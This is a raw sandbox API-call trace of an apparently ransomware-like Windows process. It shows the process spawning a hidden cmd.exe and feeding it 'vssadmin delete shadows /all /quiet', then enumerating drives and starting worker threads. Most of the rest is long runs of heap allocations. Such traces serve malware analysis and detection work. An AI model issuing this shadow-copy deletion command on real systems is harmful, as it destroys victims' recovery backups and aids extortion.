Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0157.291] lstrlenW (lpString="kernel32.dll") returned 12 [0157.291] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0157.291] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0157.291] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74eb10 | out: hHeap=0x710000) returned 1 [0157.291] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x23fb020 | out: hHeap=0x710000) returned 1 [0157.297] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x757700 | out: hHeap=0x710000) returned 1 [0157.298] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x767708 | out: hHeap=0x710000) returned 1 [0157.300] lstrlenW (lpString="%windir%\\System32") returned 17 [0157.300] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a6f0 | out: hHeap=0x710000) returned 1 [0157.300] lstrlenW (lpString="%appdata%") returned 9 [0157.300] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74eb60 | out: hHeap=0x710000) returned 1 [0157.300] lstrlenW (lpString="%sh(Startup)%") returned 13 [0157.300] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ec00 | out: hHeap=0x710000) returned 1 [0157.300] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0157.300] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a540 | out: hHeap=0x710000) returned 1 [0157.300] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553f0 [0157.300] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553f0, Size=0x20) returned 0x74e7f0 [0157.300] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e7f0, Size=0x40) returned 0x72a348 [0157.300] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a348, Size=0x80) returned 0x754e20 [0157.300] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553a8 [0157.300] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553a8, Size=0x20) returned 0x74ebd8 [0157.300] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1fffc) returned 0x757700 [0157.301] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x777708 [0157.301] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x787710 [0157.301] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755408 [0157.301] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755408, Size=0x20) returned 0x74eac0 [0157.301] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eac0, Size=0x40) returned 0x72a588 [0157.301] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a588, Size=0x80) returned 0x754c88 [0157.301] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754c88, Size=0x100) returned 0x755f40 [0157.302] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0157.302] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755f40 | out: hHeap=0x710000) returned 1 [0157.302] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x777708, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0157.302] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x787710 | out: hHeap=0x710000) returned 1 [0157.302] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x777708 | out: hHeap=0x710000) returned 1 [0157.303] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x248, hWritePipe=0x19fd54*=0x24c) returned 1 [0157.304] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x250, hWritePipe=0x19fdc4*=0x254) returned 1 [0157.305] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0157.305] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0157.305] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x25c, hThread=0x258, dwProcessId=0x1160, dwThreadId=0x115c)) returned 1 [0158.033] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0158.033] WriteFile (in: hFile=0x24c, lpBuffer=0x754e20*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x754e20*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0158.033] CloseHandle (hObject=0x25c) returned 1 [0158.033] CloseHandle (hObject=0x258) returned 1 [0158.033] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x757700 | out: hHeap=0x710000) returned 1 [0158.033] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0158.033] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754e20 | out: hHeap=0x710000) returned 1 [0158.033] lstrlenW (lpString="%comspec%") returned 9 [0158.033] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ebd8 | out: hHeap=0x710000) returned 1 [0158.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x258 [0158.034] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x755198 [0158.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x755198, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x25c [0158.035] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7532b0 [0158.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x7532b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0158.036] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7553c0 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7553c0, Size=0x20) returned 0x74ec78 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ec78, Size=0x40) returned 0x72a030 [0158.036] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0158.036] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xd0) returned 0x72b030 [0158.036] GetLogicalDrives () returned 0x4 [0158.036] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10014) returned 0x757700 [0158.036] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755288 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755288, Size=0x20) returned 0x74eac0 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eac0, Size=0x40) returned 0x72a270 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a270, Size=0x80) returned 0x7548d0 [0158.036] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7548d0, Size=0x100) returned 0x755fd0 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x200) returned 0x755fd0 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x400) returned 0x755fd0 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x800) returned 0x767720 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x767720, Size=0x1000) returned 0x767720 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x768728 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755288 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7551c8 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x753360 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7553a8 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x7532d0 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755330 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7532d0, Size=0x8) returned 0x7532c0 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755240 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7532c0, Size=0x10) returned 0x755438 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755300 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755180 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755438, Size=0x20) returned 0x74eae8 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7552b8 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7532a0 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7551e0 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7553f0 [0158.037] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74eae8, Size=0x40) returned 0x72a420 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7552d0 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x755378 [0158.037] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7551f8 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x755318 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755360 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755390 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753270 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7553c0 [0158.038] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a420, Size=0x80) returned 0x754af0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7553d8 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755420 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755408 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755438 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755480 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x755498 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7554b0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7531c0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7554c8 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7554f8 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7554e0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755510 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x755468 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x755528 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778e80 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778dd8 [0158.038] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754af0, Size=0x100) returned 0x755fd0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778e20 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778e38 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778df0 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x778e08 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778e98 [0158.038] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778e50 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7532f0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778e68 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778f10 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778d78 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x753300 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778eb0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ec8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753310 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ee0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ef8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778d90 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778d60 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778da8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778dc0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7787d8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778820 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x778a48 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7789d0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778940 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7788c8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a18 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7531f0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7787a8 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778778 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778790 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7789e8 [0158.039] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x200) returned 0x755fd0 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778898 [0158.039] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7532c0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7788f8 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a00 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778838 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7787c0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778850 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778910 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7788b0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7788e0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778760 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778928 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778868 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778808 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778880 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778958 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778970 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778988 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7789a0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7789b8 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a30 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7787f0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c10 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753190 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c28 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778cd0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778d00 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753180 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778bc8 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778b50 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ca0 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ce8 [0158.040] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778cb8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b08 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a90 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b20 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778d18 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778aa8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c40 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b38 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a78 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778ac0 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778d30 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778d48 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778a60 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778bb0 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778ad8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b68 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778af0 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753230 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x753220 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b80 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c58 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778be0 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c70 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778b98 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x778bf8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778c88 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779310 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7792c8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7792f8 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7792b0 [0158.041] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7793d0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779400 [0158.042] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755fd0, Size=0x400) returned 0x755fd0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779550 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779508 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779388 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779478 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7792e0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779340 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779328 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779460 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7793a0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779358 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x753240 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7794d8 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779490 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779448 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7793e8 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779418 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7793b8 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7794f0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779370 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779430 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7794a8 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7794c0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779520 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779538 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779268 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779280 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x7531a0 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779298 [0158.042] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779598 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779688 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7795e0 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7796a0 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779568 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779610 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7795b0 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779718 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x7796b8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7796d0 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x779700 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779580 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7795c8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7795f8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779628 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779640 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x779658 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7796e8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779670 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7791d8 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778f80 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x778f98 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779250 [0158.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x779070 